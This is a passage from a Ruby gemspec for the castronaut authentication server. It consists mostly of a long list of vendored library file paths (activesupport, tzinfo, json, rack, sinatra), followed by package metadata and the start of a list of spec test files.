"vendor/activesupport/lib/active_support/ordered_options.rb",
"vendor/activesupport/lib/active_support/rescuable.rb",
"vendor/activesupport/lib/active_support/secure_random.rb",
"vendor/activesupport/lib/active_support/string_inquirer.rb",
"vendor/activesupport/lib/active_support/test_case.rb",
"vendor/activesupport/lib/active_support/testing/core_ext/test.rb",
"vendor/activesupport/lib/active_support/testing/core_ext/test/unit/assertions.rb",
"vendor/activesupport/lib/active_support/testing/default.rb",
"vendor/activesupport/lib/active_support/testing/performance.rb",
"vendor/activesupport/lib/active_support/testing/setup_and_teardown.rb",
"vendor/activesupport/lib/active_support/time_with_zone.rb",
"vendor/activesupport/lib/active_support/values/time_zone.rb",
"vendor/activesupport/lib/active_support/values/unicode_tables.dat",
"vendor/activesupport/lib/active_support/vendor.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/blankslate.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/blankslate.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/css.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xchar.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlbase.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlevents.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlmarkup.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n/backend/simple.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n/exceptions.rb",
"vendor/activesupport/lib/active_support/vendor/memcache-client-1.5.1/memcache.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/data_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/data_timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Algiers.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Cairo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Casablanca.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Harare.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Johannesburg.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Monrovia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Nairobi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Argentina/Buenos_Aires.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Argentina/San_Juan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Bogota.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Caracas.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Chicago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Chihuahua.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Denver.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Godthab.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Guatemala.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Halifax.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Indiana/Indianapolis.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Juneau.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/La_Paz.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Lima.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Los_Angeles.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Mazatlan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Mexico_City.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Monterrey.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/New_York.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Phoenix.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Regina.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Santiago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Sao_Paulo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/St_Johns.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Tijuana.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Almaty.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Baghdad.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Baku.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Bangkok.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Chongqing.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Colombo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Dhaka.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Hong_Kong.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Irkutsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Jakarta.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Jerusalem.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kabul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kamchatka.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Karachi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Katmandu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kolkata.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Krasnoyarsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kuala_Lumpur.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kuwait.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Magadan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Muscat.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Novosibirsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Rangoon.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Riyadh.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Seoul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Shanghai.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Singapore.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Taipei.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tashkent.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tbilisi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tehran.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tokyo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Ulaanbaatar.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Urumqi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Vladivostok.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yakutsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yekaterinburg.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yerevan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/Azores.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/Cape_Verde.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/South_Georgia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Adelaide.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Brisbane.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Darwin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Hobart.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Melbourne.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Perth.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Sydney.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Etc/UTC.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Amsterdam.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Athens.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Belgrade.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Berlin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Bratislava.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Brussels.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Bucharest.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Budapest.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Copenhagen.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Dublin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Helsinki.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Istanbul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Kiev.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Lisbon.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Ljubljana.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/London.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Madrid.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Minsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Moscow.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Paris.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Prague.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Riga.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Rome.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Sarajevo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Skopje.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Sofia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Stockholm.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Tallinn.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Vienna.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Vilnius.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Warsaw.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Zagreb.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Auckland.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Fiji.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Guam.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Honolulu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Majuro.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Midway.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Noumea.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Pago_Pago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Port_Moresby.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Tongatapu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/info_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/linked_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/linked_timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/offset_rationals.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/ruby_core_support.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/time_or_datetime.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_definition.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_offset_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_period.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_transition_info.rb",
"vendor/activesupport/lib/active_support/vendor/xml-simple-1.0.11/xmlsimple.rb",
"vendor/activesupport/lib/active_support/version.rb",
"vendor/activesupport/lib/active_support/whiny_nil.rb",
"vendor/activesupport/lib/activesupport.rb",
"vendor/isaac/LICENSE",
"vendor/isaac/README",
"vendor/isaac/TODO",
"vendor/isaac/VERSIONS",
"vendor/isaac/crypt/ISAAC.rb",
"vendor/isaac/isaac.gemspec",
"vendor/isaac/setup.rb",
"vendor/isaac/test/TC_ISAAC.rb",
"vendor/json/CHANGES",
"vendor/json/GPL",
"vendor/json/README",
"vendor/json/RUBY",
"vendor/json/Rakefile",
"vendor/json/TODO",
"vendor/json/VERSION",
"vendor/json/benchmarks/benchmark.txt",
"vendor/json/benchmarks/benchmark_generator.rb",
"vendor/json/benchmarks/benchmark_parser.rb",
"vendor/json/benchmarks/benchmark_rails.rb",
"vendor/json/bin/edit_json.rb",
"vendor/json/bin/prettify_json.rb",
"vendor/json/data/example.json",
"vendor/json/data/index.html",
"vendor/json/data/prototype.js",
"vendor/json/ext/json/ext/generator/extconf.rb",
"vendor/json/ext/json/ext/generator/generator.c",
"vendor/json/ext/json/ext/generator/unicode.c",
"vendor/json/ext/json/ext/generator/unicode.h",
"vendor/json/ext/json/ext/parser/extconf.rb",
"vendor/json/ext/json/ext/parser/parser.c",
"vendor/json/ext/json/ext/parser/parser.rl",
"vendor/json/ext/json/ext/parser/unicode.c",
"vendor/json/ext/json/ext/parser/unicode.h",
"vendor/json/install.rb",
"vendor/json/lib/json.rb",
"vendor/json/lib/json/Array.xpm",
"vendor/json/lib/json/FalseClass.xpm",
"vendor/json/lib/json/Hash.xpm",
"vendor/json/lib/json/Key.xpm",
"vendor/json/lib/json/NilClass.xpm",
"vendor/json/lib/json/Numeric.xpm",
"vendor/json/lib/json/String.xpm",
"vendor/json/lib/json/TrueClass.xpm",
"vendor/json/lib/json/add/core.rb",
"vendor/json/lib/json/add/rails.rb",
"vendor/json/lib/json/common.rb",
"vendor/json/lib/json/editor.rb",
"vendor/json/lib/json/ext.rb",
"vendor/json/lib/json/json.xpm",
"vendor/json/lib/json/pure.rb",
"vendor/json/lib/json/pure/generator.rb",
"vendor/json/lib/json/pure/parser.rb",
"vendor/json/lib/json/version.rb",
"vendor/json/tests/fixtures/fail1.json",
"vendor/json/tests/fixtures/fail10.json",
"vendor/json/tests/fixtures/fail11.json",
"vendor/json/tests/fixtures/fail12.json",
"vendor/json/tests/fixtures/fail13.json",
"vendor/json/tests/fixtures/fail14.json",
"vendor/json/tests/fixtures/fail18.json",
"vendor/json/tests/fixtures/fail19.json",
"vendor/json/tests/fixtures/fail2.json",
"vendor/json/tests/fixtures/fail20.json",
"vendor/json/tests/fixtures/fail21.json",
"vendor/json/tests/fixtures/fail22.json",
"vendor/json/tests/fixtures/fail23.json",
"vendor/json/tests/fixtures/fail24.json",
"vendor/json/tests/fixtures/fail25.json",
"vendor/json/tests/fixtures/fail27.json",
"vendor/json/tests/fixtures/fail28.json",
"vendor/json/tests/fixtures/fail3.json",
"vendor/json/tests/fixtures/fail4.json",
"vendor/json/tests/fixtures/fail5.json",
"vendor/json/tests/fixtures/fail6.json",
"vendor/json/tests/fixtures/fail7.json",
"vendor/json/tests/fixtures/fail8.json",
"vendor/json/tests/fixtures/fail9.json",
"vendor/json/tests/fixtures/pass1.json",
"vendor/json/tests/fixtures/pass15.json",
"vendor/json/tests/fixtures/pass16.json",
"vendor/json/tests/fixtures/pass17.json",
"vendor/json/tests/fixtures/pass2.json",
"vendor/json/tests/fixtures/pass26.json",
"vendor/json/tests/fixtures/pass3.json",
"vendor/json/tests/runner.rb",
"vendor/json/tests/test_json.rb",
"vendor/json/tests/test_json_addition.rb",
"vendor/json/tests/test_json_fixtures.rb",
"vendor/json/tests/test_json_generate.rb",
"vendor/json/tests/test_json_rails.rb",
"vendor/json/tests/test_json_unicode.rb",
"vendor/json/tools/fuzz.rb",
"vendor/json/tools/server.rb",
"vendor/rack/AUTHORS",
"vendor/rack/COPYING",
"vendor/rack/KNOWN-ISSUES",
"vendor/rack/RDOX",
"vendor/rack/README",
"vendor/rack/Rakefile",
"vendor/rack/SPEC",
"vendor/rack/bin/rackup",
"vendor/rack/contrib/rack_logo.svg",
"vendor/rack/example/lobster.ru",
"vendor/rack/example/protectedlobster.rb",
"vendor/rack/example/protectedlobster.ru",
"vendor/rack/lib/rack.rb",
"vendor/rack/lib/rack/adapter/camping.rb",
"vendor/rack/lib/rack/auth/abstract/handler.rb",
"vendor/rack/lib/rack/auth/abstract/request.rb",
"vendor/rack/lib/rack/auth/basic.rb",
"vendor/rack/lib/rack/auth/digest/md5.rb",
"vendor/rack/lib/rack/auth/digest/nonce.rb",
"vendor/rack/lib/rack/auth/digest/params.rb",
"vendor/rack/lib/rack/auth/digest/request.rb",
"vendor/rack/lib/rack/auth/openid.rb",
"vendor/rack/lib/rack/builder.rb",
"vendor/rack/lib/rack/cascade.rb",
"vendor/rack/lib/rack/commonlogger.rb",
"vendor/rack/lib/rack/conditionalget.rb",
"vendor/rack/lib/rack/content_length.rb",
"vendor/rack/lib/rack/deflater.rb",
"vendor/rack/lib/rack/directory.rb",
"vendor/rack/lib/rack/file.rb",
"vendor/rack/lib/rack/handler.rb",
"vendor/rack/lib/rack/handler/cgi.rb",
"vendor/rack/lib/rack/handler/evented_mongrel.rb",
"vendor/rack/lib/rack/handler/fastcgi.rb",
"vendor/rack/lib/rack/handler/lsws.rb",
"vendor/rack/lib/rack/handler/mongrel.rb",
"vendor/rack/lib/rack/handler/scgi.rb",
"vendor/rack/lib/rack/handler/swiftiplied_mongrel.rb",
"vendor/rack/lib/rack/handler/thin.rb",
"vendor/rack/lib/rack/handler/webrick.rb",
"vendor/rack/lib/rack/head.rb",
"vendor/rack/lib/rack/lint.rb",
"vendor/rack/lib/rack/lobster.rb",
"vendor/rack/lib/rack/methodoverride.rb",
"vendor/rack/lib/rack/mime.rb",
"vendor/rack/lib/rack/mock.rb",
"vendor/rack/lib/rack/recursive.rb",
"vendor/rack/lib/rack/reloader.rb",
"vendor/rack/lib/rack/request.rb",
"vendor/rack/lib/rack/response.rb",
"vendor/rack/lib/rack/session/abstract/id.rb",
"vendor/rack/lib/rack/session/cookie.rb",
"vendor/rack/lib/rack/session/memcache.rb",
"vendor/rack/lib/rack/session/pool.rb",
"vendor/rack/lib/rack/showexceptions.rb",
"vendor/rack/lib/rack/showstatus.rb",
"vendor/rack/lib/rack/static.rb",
"vendor/rack/lib/rack/urlmap.rb",
"vendor/rack/lib/rack/utils.rb",
"vendor/rack/test/cgi/lighttpd.conf",
"vendor/rack/test/cgi/test",
"vendor/rack/test/cgi/test.fcgi",
"vendor/rack/test/cgi/test.ru",
"vendor/rack/test/spec_rack_auth_basic.rb",
"vendor/rack/test/spec_rack_auth_digest.rb",
"vendor/rack/test/spec_rack_auth_openid.rb",
"vendor/rack/test/spec_rack_builder.rb",
"vendor/rack/test/spec_rack_camping.rb",
"vendor/rack/test/spec_rack_cascade.rb",
"vendor/rack/test/spec_rack_cgi.rb",
"vendor/rack/test/spec_rack_commonlogger.rb",
"vendor/rack/test/spec_rack_conditionalget.rb",
"vendor/rack/test/spec_rack_content_length.rb",
"vendor/rack/test/spec_rack_deflater.rb",
"vendor/rack/test/spec_rack_directory.rb",
"vendor/rack/test/spec_rack_fastcgi.rb",
"vendor/rack/test/spec_rack_file.rb",
"vendor/rack/test/spec_rack_handler.rb",
"vendor/rack/test/spec_rack_head.rb",
"vendor/rack/test/spec_rack_lint.rb",
"vendor/rack/test/spec_rack_lobster.rb",
"vendor/rack/test/spec_rack_methodoverride.rb",
"vendor/rack/test/spec_rack_mock.rb",
"vendor/rack/test/spec_rack_mongrel.rb",
"vendor/rack/test/spec_rack_recursive.rb",
"vendor/rack/test/spec_rack_request.rb",
"vendor/rack/test/spec_rack_response.rb",
"vendor/rack/test/spec_rack_session_cookie.rb",
"vendor/rack/test/spec_rack_session_memcache.rb",
"vendor/rack/test/spec_rack_session_pool.rb",
"vendor/rack/test/spec_rack_showexceptions.rb",
"vendor/rack/test/spec_rack_showstatus.rb",
"vendor/rack/test/spec_rack_static.rb",
"vendor/rack/test/spec_rack_thin.rb",
"vendor/rack/test/spec_rack_urlmap.rb",
"vendor/rack/test/spec_rack_utils.rb",
"vendor/rack/test/spec_rack_webrick.rb",
"vendor/rack/test/testrequest.rb",
"vendor/sinatra/AUTHORS",
"vendor/sinatra/CHANGES",
"vendor/sinatra/LICENSE",
"vendor/sinatra/README.rdoc",
"vendor/sinatra/Rakefile",
"vendor/sinatra/compat/app_test.rb",
"vendor/sinatra/compat/application_test.rb",
"vendor/sinatra/compat/builder_test.rb",
"vendor/sinatra/compat/custom_error_test.rb",
"vendor/sinatra/compat/erb_test.rb",
"vendor/sinatra/compat/events_test.rb",
"vendor/sinatra/compat/filter_test.rb",
"vendor/sinatra/compat/haml_test.rb",
"vendor/sinatra/compat/helper.rb",
"vendor/sinatra/compat/mapped_error_test.rb",
"vendor/sinatra/compat/pipeline_test.rb",
"vendor/sinatra/compat/public/foo.xml",
"vendor/sinatra/compat/sass_test.rb",
"vendor/sinatra/compat/sessions_test.rb",
"vendor/sinatra/compat/streaming_test.rb",
"vendor/sinatra/compat/sym_params_test.rb",
"vendor/sinatra/compat/template_test.rb",
"vendor/sinatra/compat/use_in_file_templates_test.rb",
"vendor/sinatra/compat/views/foo.builder",
"vendor/sinatra/compat/views/foo.erb",
"vendor/sinatra/compat/views/foo.haml",
"vendor/sinatra/compat/views/foo.sass",
"vendor/sinatra/compat/views/foo_layout.erb",
"vendor/sinatra/compat/views/foo_layout.haml",
"vendor/sinatra/compat/views/layout_test/foo.builder",
"vendor/sinatra/compat/views/layout_test/foo.erb",
"vendor/sinatra/compat/views/layout_test/foo.haml",
"vendor/sinatra/compat/views/layout_test/foo.sass",
"vendor/sinatra/compat/views/layout_test/layout.builder",
"vendor/sinatra/compat/views/layout_test/layout.erb",
"vendor/sinatra/compat/views/layout_test/layout.haml",
"vendor/sinatra/compat/views/layout_test/layout.sass",
"vendor/sinatra/compat/views/no_layout/no_layout.builder",
"vendor/sinatra/compat/views/no_layout/no_layout.haml",
"vendor/sinatra/lib/sinatra.rb",
"vendor/sinatra/lib/sinatra/base.rb",
"vendor/sinatra/lib/sinatra/compat.rb",
"vendor/sinatra/lib/sinatra/images/404.png",
"vendor/sinatra/lib/sinatra/images/500.png",
"vendor/sinatra/lib/sinatra/main.rb",
"vendor/sinatra/lib/sinatra/test.rb",
"vendor/sinatra/lib/sinatra/test/bacon.rb",
"vendor/sinatra/lib/sinatra/test/rspec.rb",
"vendor/sinatra/lib/sinatra/test/spec.rb",
"vendor/sinatra/lib/sinatra/test/unit.rb",
"vendor/sinatra/sinatra.gemspec",
"vendor/sinatra/test/base_test.rb",
"vendor/sinatra/test/builder_test.rb",
"vendor/sinatra/test/data/reload_app_file.rb",
"vendor/sinatra/test/erb_test.rb",
"vendor/sinatra/test/filter_test.rb",
"vendor/sinatra/test/haml_test.rb",
"vendor/sinatra/test/helper.rb",
"vendor/sinatra/test/helpers_test.rb",
"vendor/sinatra/test/mapped_error_test.rb",
"vendor/sinatra/test/middleware_test.rb",
"vendor/sinatra/test/options_test.rb",
"vendor/sinatra/test/reload_test.rb",
"vendor/sinatra/test/request_test.rb",
"vendor/sinatra/test/result_test.rb",
"vendor/sinatra/test/routing_test.rb",
"vendor/sinatra/test/sass_test.rb",
"vendor/sinatra/test/sinatra_test.rb",
"vendor/sinatra/test/static_test.rb",
"vendor/sinatra/test/templates_test.rb",
"vendor/sinatra/test/views/hello.builder",
"vendor/sinatra/test/views/hello.erb",
"vendor/sinatra/test/views/hello.haml",
"vendor/sinatra/test/views/hello.sass",
"vendor/sinatra/test/views/hello.test",
"vendor/sinatra/test/views/layout2.builder",
"vendor/sinatra/test/views/layout2.erb",
"vendor/sinatra/test/views/layout2.haml",
"vendor/sinatra/test/views/layout2.test"
]
s.homepage = %q{http://github.com/relevance/castronaut}
s.require_paths = ["lib"]
s.rubygems_version = %q{1.3.2}
s.summary = %q{Your friendly, cigar smoking authentication dicator... From Space!}
s.test_files = [
"spec/app/controllers/application_spec.rb",
"spec/castronaut/adapters/development/adapter_spec.rb",
"spec/castronaut/adapters/development/user_spec.rb",
"spec/castronaut/adapters/ldap/adapter_spec.rb",
"spec/castronaut/adapters/ldap/user_spec.rb",
"spec/castronaut/adapters/restful_authentication/adapter_spec.rb",
"spec/castronaut/adapters/restful_authentication/user_spec.rb",
"spec/castronaut/adapters_spec.rb",
"spec/castronaut/authentication_result_spec.rb",
